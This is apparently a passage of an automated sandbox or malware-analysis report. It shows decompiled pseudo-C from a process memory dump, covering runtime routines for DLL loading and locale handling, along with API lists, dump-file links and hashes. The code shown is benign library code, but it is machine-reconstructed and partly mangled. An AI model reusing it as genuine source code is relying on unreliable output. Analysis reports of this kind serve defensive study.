                                                                                                						_v4 = 2;
                                                                                                						E00F74190(0xfc6f94, 1);
                                                                                                						E00F74190(L"ntdll.dll", 9);
                                                                                                						_t271 = _v16;
                                                                                                						_push(0x5c);
                                                                                                						_push(_t271);
                                                                                                						_t206 = E00F9559B( &_v16);
                                                                                                						if(_t206 != 0) {
                                                                                                							_t206 = LoadLibraryExW(_t271, 0, 0);
                                                                                                							_t215 = _t206;
                                                                                                						} else {
                                                                                                							_t215 = 0;
                                                                                                						}
                                                                                                						_v4 = 0;
                                                                                                						_t272 =  &(_t271[0xfffffffffffffff8]);
                                                                                                						asm("lock xadd [esi+0xc], eax");
                                                                                                						if((_t206 | 0xffffffff) - 1 <= 0) {
                                                                                                							 *((intOrPtr*)( *( *_t272) + 4))(_t272);
                                                                                                						}
                                                                                                						L13:
                                                                                                						_t143 =  *(_t259 + 4);
                                                                                                						if(_t215 != _t143) {
                                                                                                							 *((intOrPtr*)( *_t259 + 4))();
                                                                                                							 *(_t259 + 4) = _t215;
                                                                                                							_t143 = _t215;
                                                                                                						}
                                                                                                						if(_t143 == 0) {
                                                                                                							 *((intOrPtr*)(_t259 + 8)) = GetLastError();
                                                                                                						}
                                                                                                						_v4 = 0xffffffff;
                                                                                                						 *[fs:0x0] = _v12;
                                                                                                						return E00F80D7F(_a524 ^ _t273, _t250);
                                                                                                					}
                                                                                                				}
                                                                                                				L48:
                                                                                                			}





































































                                                                                                0x00f73610
                                                                                                0x00f73611
                                                                                                0x00f7361e
                                                                                                0x00f73620
                                                                                                0x00f7362b
                                                                                                0x00f7362c
                                                                                                0x00f7362f
                                                                                                0x00f73634
                                                                                                0x00f73636
                                                                                                0x00f7363c
                                                                                                0x00f7363f
                                                                                                0x00f73643
                                                                                                0x00f73649
                                                                                                0x00f7364b
                                                                                                0x00f7364e
                                                                                                0x00f73651
                                                                                                0x00f73657
                                                                                                0x00f7365e
                                                                                                0x00f7366e
                                                                                                0x00f73675
                                                                                                0x00f7367d
                                                                                                0x00f73741
                                                                                                0x00f73741
                                                                                                0x00000000
                                                                                                0x00f7368e
                                                                                                0x00f73693
                                                                                                0x00f73697
                                                                                                0x00f73791
                                                                                                0x00f73796
                                                                                                0x00f7379b
                                                                                                0x00f7379c
                                                                                                0x00f7379d
                                                                                                0x00f7379e
                                                                                                0x00f7379f
                                                                                                0x00f737a0
                                                                                                0x00f737a1
                                                                                                0x00f737ae
                                                                                                0x00f737b0
                                                                                                0x00f737bb
                                                                                                0x00f737bc
                                                                                                0x00f737bf
                                                                                                0x00f737c4
                                                                                                0x00f737c6
                                                                                                0x00f737cc
                                                                                                0x00f737cd
                                                                                                0x00f737ce
                                                                                                0x00f737cf
                                                                                                0x00f737d3
                                                                                                0x00f737d9
                                                                                                0x00f737db
                                                                                                0x00f737de
                                                                                                0x00f737e1
                                                                                                0x00f737e4
                                                                                                0x00f737eb
                                                                                                0x00f737f2
                                                                                                0x00f737f4
                                                                                                0x00f737f6
                                                                                                0x00f737f9
                                                                                                0x00f737fc
                                                                                                0x00f737ff
                                                                                                0x00f73806
                                                                                                0x00f7380c
                                                                                                0x00f7380f
                                                                                                0x00f73816
                                                                                                0x00f73819
                                                                                                0x00f7381d
                                                                                                0x00f73820
                                                                                                0x00f73884
                                                                                                0x00f73889
                                                                                                0x00f7388c
                                                                                                0x00f73893
                                                                                                0x00f7389a
                                                                                                0x00f738a0
                                                                                                0x00f738a2
                                                                                                0x00f739ed
                                                                                                0x00f739f0
                                                                                                0x00f739f2
                                                                                                0x00f739f5
                                                                                                0x00f739f8
                                                                                                0x00f739ff
                                                                                                0x00f73a06
                                                                                                0x00f73a0d
                                                                                                0x00f73a14
                                                                                                0x00f73a18
                                                                                                0x00f73a1b
                                                                                                0x00f73a22
                                                                                                0x00f73a24
                                                                                                0x00f73a27
                                                                                                0x00f73a2d
                                                                                                0x00f73a2d
                                                                                                0x00f73a34
                                                                                                0x00f73a3b
                                                                                                0x00f73a41
                                                                                                0x00f73a43
                                                                                                0x00f73a4d
                                                                                                0x00f73a4f
                                                                                                0x00f73a4f
                                                                                                0x00f73a56
                                                                                                0x00000000
                                                                                                0x00f73a56
                                                                                                0x00000000
                                                                                                0x00f738b0
                                                                                                0x00f738b0
                                                                                                0x00f738ba
                                                                                                0x00f738c0
                                                                                                0x00f738c2
                                                                                                0x00f738c9
                                                                                                0x00f738cc
                                                                                                0x00f738d0
                                                                                                0x00f738d3
                                                                                                0x00f738eb
                                                                                                0x00f738f0
                                                                                                0x00f738f4
                                                                                                0x00f738f6
                                                                                                0x00f738fa
                                                                                                0x00f738fd
                                                                                                0x00f73904
                                                                                                0x00f73907
                                                                                                0x00f7390e
                                                                                                0x00f73915
                                                                                                0x00f73920
                                                                                                0x00f73920
                                                                                                0x00f73923
                                                                                                0x00f73926
                                                                                                0x00f73926
                                                                                                0x00f73937
                                                                                                0x00f7393c
                                                                                                0x00f73943
                                                                                                0x00f73949
                                                                                                0x00f7394c
                                                                                                0x00f73950
                                                                                                0x00f73956
                                                                                                0x00f73958
                                                                                                0x00f73a88
                                                                                                0x00f73a8d
                                                                                                0x00f73a8e
                                                                                                0x00f73a8f
                                                                                                0x00f73a90
                                                                                                0x00f73a93
                                                                                                0x00f73a95
                                                                                                0x00f73aa0
                                                                                                0x00f73aa1
                                                                                                0x00f73aa2
                                                                                                0x00f73aa3
                                                                                                0x00f73aaa
                                                                                                0x00f73aab
                                                                                                0x00f73aae
                                                                                                0x00f73ab4
                                                                                                0x00f73ab6
                                                                                                0x00f73ab9
                                                                                                0x00f73ac0
                                                                                                0x00f73ac3
                                                                                                0x00f73ac5
                                                                                                0x00f73ac9
                                                                                                0x00f73acb
                                                                                                0x00f73acb
                                                                                                0x00f73ad2
                                                                                                0x00f73ad5
                                                                                                0x00f73ad5
                                                                                                0x00f73adf
                                                                                                0x00f73aeb
                                                                                                0x00f7395e
                                                                                                0x00f7396f
                                                                                                0x00f73973
                                                                                                0x00f73975
                                                                                                0x00f73977
                                                                                                0x00f7397e
                                                                                                0x00f73983
                                                                                                0x00f7398a
                                                                                                0x00f7398f
                                                                                                0x00f73991
                                                                                                0x00f73993
                                                                                                0x00f73996
                                                                                                0x00f739ad
                                                                                                0x00f739b2
                                                                                                0x00f73998
                                                                                                0x00f7399b
                                                                                                0x00f7399d
                                                                                                0x00f739a0
                                                                                                0x00f739a0
                                                                                                0x00f73996
                                                                                                0x00f739b5
                                                                                                0x00f739b9
                                                                                                0x00f739c0
                                                                                                0x00f739c2
                                                                                                0x00f739c4
                                                                                                0x00000000
                                                                                                0x00f739c4
                                                                                                0x00000000
                                                                                                0x00f739c2
                                                                                                0x00f738d5
                                                                                                0x00f738d5
                                                                                                0x00f738d9
                                                                                                0x00f738e0
                                                                                                0x00f739c5
                                                                                                0x00f739c5
                                                                                                0x00f739cb
                                                                                                0x00000000
                                                                                                0x00f739cb
                                                                                                0x00000000
                                                                                                0x00f739d2
                                                                                                0x00f739d9
                                                                                                0x00f739df
                                                                                                0x00f739df
                                                                                                0x00f739e7
                                                                                                0x00f739ea
                                                                                                0x00000000
                                                                                                0x00f739ea
                                                                                                0x00f73822
                                                                                                0x00f73822
                                                                                                0x00f73824
                                                                                                0x00f73827
                                                                                                0x00f7382a
                                                                                                0x00f7382d
                                                                                                0x00f73830
                                                                                                0x00f73833
                                                                                                0x00f7383a
                                                                                                0x00f7383f
                                                                                                0x00f73846
                                                                                                0x00f7384c
                                                                                                0x00f7384f
                                                                                                0x00f73852
                                                                                                0x00f73858
                                                                                                0x00f7385a
                                                                                                0x00f73860
                                                                                                0x00f73862
                                                                                                0x00f73868
                                                                                                0x00f73871
                                                                                                0x00f73a59
                                                                                                0x00f73a59
                                                                                                0x00f73a59
                                                                                                0x00f73a63
                                                                                                0x00f73a68
                                                                                                0x00f73a79
                                                                                                0x00f73a87
                                                                                                0x00f73a87
                                                                                                0x00f7369d
                                                                                                0x00f736a5
                                                                                                0x00f736a8
                                                                                                0x00f736ba
                                                                                                0x00f736bc
                                                                                                0x00f736bf
                                                                                                0x00f736c2
                                                                                                0x00f736c2
                                                                                                0x00f736c5
                                                                                                0x00f736c8
                                                                                                0x00f736d9
                                                                                                0x00f736d9
                                                                                                0x00f736de
                                                                                                0x00f736ec
                                                                                                0x00f736fb
                                                                                                0x00f73700
                                                                                                0x00f73703
                                                                                                0x00f73705
                                                                                                0x00f73706
                                                                                                0x00f73710
                                                                                                0x00f7371b
                                                                                                0x00f73721
                                                                                                0x00f73712
                                                                                                0x00f73712
                                                                                                0x00f73712
                                                                                                0x00f73723
                                                                                                0x00f73727
                                                                                                0x00f7372d
                                                                                                0x00f73735
                                                                                                0x00f7373c
                                                                                                0x00f7373c
                                                                                                0x00f73743
                                                                                                0x00f73743
                                                                                                0x00f73748
                                                                                                0x00f7374e
                                                                                                0x00f73751
                                                                                                0x00f73754
                                                                                                0x00f73754
                                                                                                0x00f73758
                                                                                                0x00f73760
                                                                                                0x00f73760
                                                                                                0x00f73763
                                                                                                0x00f7376f
                                                                                                0x00f7378e
                                                                                                0x00f7378e
                                                                                                0x00f73697
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F73675
                                                                                                • GetLastError.KERNEL32(?,?,?,00FB57E0,000000FF), ref: 00F7375A
                                                                                                  • Part of subcall function 00F72170: GetProcessHeap.KERNEL32(FD8FA683,?,00FB542C,000000FF), ref: 00F721AA
                                                                                                  • Part of subcall function 00F73FC0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00F736B8,-00000010,?,?,?,00FB57E0,000000FF), ref: 00F74006
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00F73706
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00FB57E0,000000FF), ref: 00F7371B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                • String ID: ntdll.dll
                                                                                                • API String ID: 3941625479-2227199552
                                                                                                • Opcode ID: 1fe64671cfa3c3a782f78a8d1fed2fedfa9a564afc73700928b65bca15d98f41
                                                                                                • Instruction ID: 9669ee50974a2c8e9d55c5b37a6391c8734886297a445f00b02a9a7fcb3b968f
                                                                                                • Opcode Fuzzy Hash: 1fe64671cfa3c3a782f78a8d1fed2fedfa9a564afc73700928b65bca15d98f41
                                                                                                • Instruction Fuzzy Hash: 7B41C4B1A04609AFDB14DF68CC45BEEB7A4FF04310F14852AE919D7281EB74AA05EB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E00F9292A(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				void* _t32;
                                                                                                				void* _t34;
                                                                                                				signed int _t38;
                                                                                                				signed int _t39;
                                                                                                				intOrPtr _t47;
                                                                                                				intOrPtr _t49;
                                                                                                				void* _t50;
                                                                                                				intOrPtr* _t51;
                                                                                                				intOrPtr _t52;
                                                                                                				signed int _t53;
                                                                                                				void* _t59;
                                                                                                				void* _t64;
                                                                                                				intOrPtr _t67;
                                                                                                				void* _t68;
                                                                                                				void* _t72;
                                                                                                
                                                                                                				_t72 = __eflags;
                                                                                                				_t52 = __ecx;
                                                                                                				_push(0x30);
                                                                                                				E00FB38B2(0xfb7745, __edi, __esi);
                                                                                                				_t49 = _t52;
                                                                                                				 *((intOrPtr*)(_t68 - 0x10)) = _t49;
                                                                                                				_t32 = E00F85A28(_t72, _t68 - 0x3c);
                                                                                                				_t50 = _t49 + 0x2c;
                                                                                                				_t53 = 0xb;
                                                                                                				memcpy(_t50, _t32, _t53 << 2);
                                                                                                				_t34 = E00FA1EE6(_t59);
                                                                                                				_t67 =  *((intOrPtr*)(_t68 - 0x10));
                                                                                                				_t64 = _t34;
                                                                                                				 *((intOrPtr*)(_t68 - 0x10)) = _t67;
                                                                                                				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 0x10)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 0x14)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 0x18)) = 0;
                                                                                                				_push(_t50);
                                                                                                				_push(0);
                                                                                                				 *((intOrPtr*)(_t68 - 4)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 8)) = E00F7F7A0( *((intOrPtr*)(_t64 + 0x1c)));
                                                                                                				E00F911B1(_t67, 0, _t64);
                                                                                                				if( *((char*)(_t67 + 0x28)) == 0) {
                                                                                                					_t38 =  *((intOrPtr*)(_t64 + 0x29));
                                                                                                				} else {
                                                                                                					_t38 =  *((intOrPtr*)(_t64 + 0x28));
                                                                                                				}
                                                                                                				_t39 = _t38;
                                                                                                				 *(_t67 + 0x1c) = _t39;
                                                                                                				if(_t39 < 0 || _t39 >= 0x7f) {
                                                                                                					 *(_t67 + 0x1c) =  *(_t67 + 0x1c) & 0x00000000;
                                                                                                				}
                                                                                                				_t20 = _t67 + 0x20; // 0x20
                                                                                                				_t51 = _t20;
                                                                                                				E00F8CB18(_t67, _t51,  *((char*)(_t64 + 0x2b)),  *((char*)(_t64 + 0x2a)),  *((char*)(_t64 + 0x2e)));
                                                                                                				_t24 = _t67 + 0x24; // 0x24
                                                                                                				_t47 = E00F8CB18(_t67, _t24,  *((char*)(_t64 + 0x2d)),  *((char*)(_t64 + 0x2c)),  *((char*)(_t64 + 0x2f)));
                                                                                                				if( *((char*)(_t68 + 0xc)) != 0) {
                                                                                                					_t47 = 0x76782b24;
                                                                                                					 *_t51 = 0x76782b24;
                                                                                                					 *((intOrPtr*)(_t67 + 0x24)) = 0x76782b24;
                                                                                                				}
                                                                                                				return E00FB388C(_t47);
                                                                                                			}


















                                                                                                0x00f9292a
                                                                                                0x00f9292a
                                                                                                0x00f9292a
                                                                                                0x00f92931
                                                                                                0x00f92936
                                                                                                0x00f92938
                                                                                                0x00f9293f
                                                                                                0x00f92944
                                                                                                0x00f9294b
                                                                                                0x00f9294e
                                                                                                0x00f92950
                                                                                                0x00f92955
                                                                                                0x00f92958
                                                                                                0x00f9295c
                                                                                                0x00f9295f
                                                                                                0x00f92962
                                                                                                0x00f92965
                                                                                                0x00f92968
                                                                                                0x00f9296b
                                                                                                0x00f9296c
                                                                                                0x00f92970
                                                                                                0x00f9297b
                                                                                                0x00f92983
                                                                                                0x00f9298c
                                                                                                0x00f92993
                                                                                                0x00f9298e
                                                                                                0x00f9298e
                                                                                                0x00f9298e
                                                                                                0x00f92996
                                                                                                0x00f92999
                                                                                                0x00f9299e
                                                                                                0x00f929a5
                                                                                                0x00f929a5
                                                                                                0x00f929ad
                                                                                                0x00f929ad
                                                                                                0x00f929be
                                                                                                0x00f929c7
                                                                                                0x00f929d8
                                                                                                0x00f929e1
                                                                                                0x00f929e3
                                                                                                0x00f929e8
                                                                                                0x00f929ea
                                                                                                0x00f929ea
                                                                                                0x00f929f2

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Mpunct$GetcvtH_prolog3
                                                                                                • String ID: $+xv
                                                                                                • API String ID: 279835032-1686923651
                                                                                                • Opcode ID: 24932e2de602e1dadafca47549ec47b3873bf3a97e459867b7ef976bcab9f1c1
                                                                                                • Instruction ID: cad04adc3bacd0517ddbcf56a4f5c1003bcca90d2b26d1b7c5e8b5dc27dfcfbe
                                                                                                • Opcode Fuzzy Hash: 24932e2de602e1dadafca47549ec47b3873bf3a97e459867b7ef976bcab9f1c1
                                                                                                • Instruction Fuzzy Hash: B321B5B1904B526EEB65DF75888077BBEF8BB0C310F04091AE099C7A41D734E601EB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E00F8BA7A(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				void* _t32;
                                                                                                				void* _t34;
                                                                                                				signed int _t38;
                                                                                                				signed int _t39;
                                                                                                				intOrPtr _t47;
                                                                                                				intOrPtr _t49;
                                                                                                				void* _t50;
                                                                                                				intOrPtr* _t51;
                                                                                                				intOrPtr _t52;
                                                                                                				signed int _t53;
                                                                                                				void* _t59;
                                                                                                				void* _t64;
                                                                                                				intOrPtr _t67;
                                                                                                				void* _t68;
                                                                                                				void* _t72;
                                                                                                
                                                                                                				_t72 = __eflags;
                                                                                                				_t52 = __ecx;
                                                                                                				_push(0x30);
                                                                                                				E00FB38B2(0xfb7745, __edi, __esi);
                                                                                                				_t49 = _t52;
                                                                                                				 *((intOrPtr*)(_t68 - 0x10)) = _t49;
                                                                                                				_t32 = E00F85A28(_t72, _t68 - 0x3c);
                                                                                                				_t50 = _t49 + 0x2c;
                                                                                                				_t53 = 0xb;
                                                                                                				memcpy(_t50, _t32, _t53 << 2);
                                                                                                				_t34 = E00FA1EE6(_t59);
                                                                                                				_t67 =  *((intOrPtr*)(_t68 - 0x10));
                                                                                                				_t64 = _t34;
                                                                                                				 *((intOrPtr*)(_t68 - 0x10)) = _t67;
                                                                                                				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 0x10)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 0x14)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 0x18)) = 0;
                                                                                                				_push(_t50);
                                                                                                				_push(0);
                                                                                                				 *((intOrPtr*)(_t68 - 4)) = 0;
                                                                                                				 *((intOrPtr*)(_t67 + 8)) = E00F7F7A0( *((intOrPtr*)(_t64 + 0x1c)));
                                                                                                				E00F8678C(_t67, 0, _t64);
                                                                                                				if( *((char*)(_t67 + 0x28)) == 0) {
                                                                                                					_t38 =  *((intOrPtr*)(_t64 + 0x29));
                                                                                                				} else {
                                                                                                					_t38 =  *((intOrPtr*)(_t64 + 0x28));
                                                                                                				}
                                                                                                				_t39 = _t38;
                                                                                                				 *(_t67 + 0x1c) = _t39;
                                                                                                				if(_t39 < 0 || _t39 >= 0x7f) {
                                                                                                					 *(_t67 + 0x1c) =  *(_t67 + 0x1c) & 0x00000000;
                                                                                                				}
                                                                                                				_t20 = _t67 + 0x20; // 0x20
                                                                                                				_t51 = _t20;
                                                                                                				E00F8CB18(_t67, _t51,  *((char*)(_t64 + 0x2b)),  *((char*)(_t64 + 0x2a)),  *((char*)(_t64 + 0x2e)));
                                                                                                				_t24 = _t67 + 0x24; // 0x24
                                                                                                				_t47 = E00F8CB18(_t67, _t24,  *((char*)(_t64 + 0x2d)),  *((char*)(_t64 + 0x2c)),  *((char*)(_t64 + 0x2f)));
                                                                                                				if( *((char*)(_t68 + 0xc)) != 0) {
                                                                                                					_t47 = 0x76782b24;
                                                                                                					 *_t51 = 0x76782b24;
                                                                                                					 *((intOrPtr*)(_t67 + 0x24)) = 0x76782b24;
                                                                                                				}
                                                                                                				return E00FB388C(_t47);
                                                                                                			}


















                                                                                                0x00f8ba7a
                                                                                                0x00f8ba7a
                                                                                                0x00f8ba7a
                                                                                                0x00f8ba81
                                                                                                0x00f8ba86
                                                                                                0x00f8ba88
                                                                                                0x00f8ba8f
                                                                                                0x00f8ba94
                                                                                                0x00f8ba9b
                                                                                                0x00f8ba9e
                                                                                                0x00f8baa0
                                                                                                0x00f8baa5
                                                                                                0x00f8baa8
                                                                                                0x00f8baac
                                                                                                0x00f8baaf
                                                                                                0x00f8bab2
                                                                                                0x00f8bab5
                                                                                                0x00f8bab8
                                                                                                0x00f8babb
                                                                                                0x00f8babc
                                                                                                0x00f8bac0
                                                                                                0x00f8bacb
                                                                                                0x00f8bad3
                                                                                                0x00f8badc
                                                                                                0x00f8bae3
                                                                                                0x00f8bade
                                                                                                0x00f8bade
                                                                                                0x00f8bade
                                                                                                0x00f8bae6
                                                                                                0x00f8bae9
                                                                                                0x00f8baee
                                                                                                0x00f8baf5
                                                                                                0x00f8baf5
                                                                                                0x00f8bafd
                                                                                                0x00f8bafd
                                                                                                0x00f8bb0e
                                                                                                0x00f8bb17
                                                                                                0x00f8bb28
                                                                                                0x00f8bb31
                                                                                                0x00f8bb33
                                                                                                0x00f8bb38
                                                                                                0x00f8bb3a
                                                                                                0x00f8bb3a
                                                                                                0x00f8bb42

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F8BA81
                                                                                                • __Getcvt.LIBCPMT ref: 00F8BA8F
                                                                                                  • Part of subcall function 00F8678C: _Maklocstr.LIBCPMT ref: 00F867AC
                                                                                                  • Part of subcall function 00F8678C: _Maklocstr.LIBCPMT ref: 00F867C9
                                                                                                  • Part of subcall function 00F8678C: _Maklocstr.LIBCPMT ref: 00F867E6
                                                                                                  • Part of subcall function 00F8678C: _Maklocchr.LIBCPMT ref: 00F867F8
                                                                                                  • Part of subcall function 00F8678C: _Maklocchr.LIBCPMT ref: 00F8680B
                                                                                                • _Mpunct.LIBCPMT ref: 00F8BB0E
                                                                                                • _Mpunct.LIBCPMT ref: 00F8BB28
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Maklocstr$MaklocchrMpunct$GetcvtH_prolog3
                                                                                                • String ID: $+xv
                                                                                                • API String ID: 1880433610-1686923651
                                                                                                • Opcode ID: e7a65379da26288b467e68bb554fe4daf6766b541540d86f7f3f891cfaec0ede
                                                                                                • Instruction ID: 0cad28eb127d445763693b4c8e9c5637374cbda47edc60ad208b8ef3f579b0df
                                                                                                • Opcode Fuzzy Hash: e7a65379da26288b467e68bb554fe4daf6766b541540d86f7f3f891cfaec0ede
                                                                                                • Instruction Fuzzy Hash: F721B2B1904B526ED725EF7588807BBBEF8AB0C300F040A1AE499C7A41E778E601DBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00F98827(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                                                                				signed int* _v8;
                                                                                                				void** _t12;
                                                                                                				void* _t16;
                                                                                                				void* _t18;
                                                                                                				signed int _t22;
                                                                                                				WCHAR* _t23;
                                                                                                				void** _t26;
                                                                                                				signed int* _t29;
                                                                                                				void* _t32;
                                                                                                				void* _t34;
                                                                                                
                                                                                                				_t29 = _a4;
                                                                                                				while(_t29 != _a8) {
                                                                                                					_t22 =  *_t29;
                                                                                                					_t12 = 0xfd0cd4 + _t22 * 4;
                                                                                                					_t32 =  *_t12;
                                                                                                					_v8 = _t12;
                                                                                                					if(_t32 == 0) {
                                                                                                						_t23 =  *(0xfbb6b0 + _t22 * 4);
                                                                                                						_t32 = LoadLibraryExW(_t23, 0, 0x800);
                                                                                                						if(_t32 != 0) {
                                                                                                							L11:
                                                                                                							_t26 = _v8;
                                                                                                							 *_t26 = _t32;
                                                                                                							if( *_t26 != 0) {
                                                                                                								FreeLibrary(_t32);
                                                                                                							}
                                                                                                							L13:
                                                                                                							if(_t32 != 0) {
                                                                                                								_t16 = _t32;
                                                                                                								L17:
                                                                                                								return _t16;
                                                                                                							}
                                                                                                							L14:
                                                                                                							_t29 =  &(_t29[1]);
                                                                                                							continue;
                                                                                                						}
                                                                                                						_t18 = GetLastError();
                                                                                                						if(_t18 != 0x57) {
                                                                                                							L8:
                                                                                                							_t32 = 0;
                                                                                                							L9:
                                                                                                							if(_t32 != 0) {
                                                                                                								goto L11;
                                                                                                							}
                                                                                                							 *_v8 = _t18 | 0xffffffff;
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						_t18 = E00F9BE48(_t23, L"api-ms-", 7);
                                                                                                						_t34 = _t34 + 0xc;
                                                                                                						if(_t18 == 0) {
                                                                                                							goto L8;
                                                                                                						}
                                                                                                						_t18 = LoadLibraryExW(_t23, _t32, _t32);
                                                                                                						_t32 = _t18;
                                                                                                						goto L9;
                                                                                                					}
                                                                                                					if(_t32 == 0xffffffff) {
                                                                                                						goto L14;
                                                                                                					}
                                                                                                					goto L13;
                                                                                                				}
                                                                                                				_t16 = 0;
                                                                                                				goto L17;
                                                                                                			}













                                                                                                0x00f9882e
                                                                                                0x00f988bf
                                                                                                0x00f98836
                                                                                                0x00f98838
                                                                                                0x00f9883f
                                                                                                0x00f98841
                                                                                                0x00f98846
                                                                                                0x00f9884f
                                                                                                0x00f98864
                                                                                                0x00f98868
                                                                                                0x00f988a6
                                                                                                0x00f988a6
                                                                                                0x00f988ab
                                                                                                0x00f988af
                                                                                                0x00f988b2
                                                                                                0x00f988b2
                                                                                                0x00f988b8
                                                                                                0x00f988ba
                                                                                                0x00f988cf
                                                                                                0x00f988ca
                                                                                                0x00f988ce
                                                                                                0x00f988ce
                                                                                                0x00f988bc
                                                                                                0x00f988bc
                                                                                                0x00000000
                                                                                                0x00f988bc
                                                                                                0x00f9886a
                                                                                                0x00f98873
                                                                                                0x00f98896
                                                                                                0x00f98896
                                                                                                0x00f98898
                                                                                                0x00f9889a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f988a2
                                                                                                0x00000000
                                                                                                0x00f988a2
                                                                                                0x00f9887d
                                                                                                0x00f98882
                                                                                                0x00f98887
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f9888c
                                                                                                0x00f98892
                                                                                                0x00000000
                                                                                                0x00f98892
                                                                                                0x00f9884b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f9884d
                                                                                                0x00f988c8
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 0-2084034818
                                                                                                • Opcode ID: 9b84d69d0a5f1177e23e8c5eb3db5eff81d720e41195bf87b13e49750c42a49f
                                                                                                • Instruction ID: d3ddac1d7da00e74fadc53e760bcc38c4402c77e8bc4d719df05cf6e3d36fda8
                                                                                                • Opcode Fuzzy Hash: 9b84d69d0a5f1177e23e8c5eb3db5eff81d720e41195bf87b13e49750c42a49f
                                                                                                • Instruction Fuzzy Hash: 78116372E01225ABEF319B249C84A6A37599F827F0B650664ED05A7290DF70DD07FAF0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 73%
                                                                                                			E00F83A55(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr _t28;
                                                                                                				char _t37;
                                                                                                				intOrPtr _t39;
                                                                                                				intOrPtr _t40;
                                                                                                				void* _t44;
                                                                                                				intOrPtr* _t46;
                                                                                                				intOrPtr _t48;
                                                                                                				void* _t49;
                                                                                                				void* _t52;
                                                                                                
                                                                                                				_t52 = __eflags;
                                                                                                				_t40 = __ecx;
                                                                                                				_push(0x34);
                                                                                                				E00FB38E6(0xfb705c, __edi, __esi);
                                                                                                				_t48 = _t40;
                                                                                                				_t46 = E00FA1EE6(_t44);
                                                                                                				E00F85A28(_t52, _t49 - 0x3c);
                                                                                                				 *((intOrPtr*)(_t49 - 0x40)) = _t48;
                                                                                                				 *((intOrPtr*)(_t48 + 8)) = 0;
                                                                                                				 *((intOrPtr*)(_t48 + 0x10)) = 0;
                                                                                                				 *((intOrPtr*)(_t48 + 0x14)) = 0;
                                                                                                				 *((intOrPtr*)(_t49 - 4)) = 0;
                                                                                                				E00F85A28(_t52, _t49 - 0x3c);
                                                                                                				_t39 =  *((intOrPtr*)(_t49 + 0xc));
                                                                                                				_t28 = 0xfc76d9;
                                                                                                				if(_t39 == 0) {
                                                                                                					_t28 =  *((intOrPtr*)(_t46 + 8));
                                                                                                				}
                                                                                                				_push(_t49 - 0x3c);
                                                                                                				_push(0);
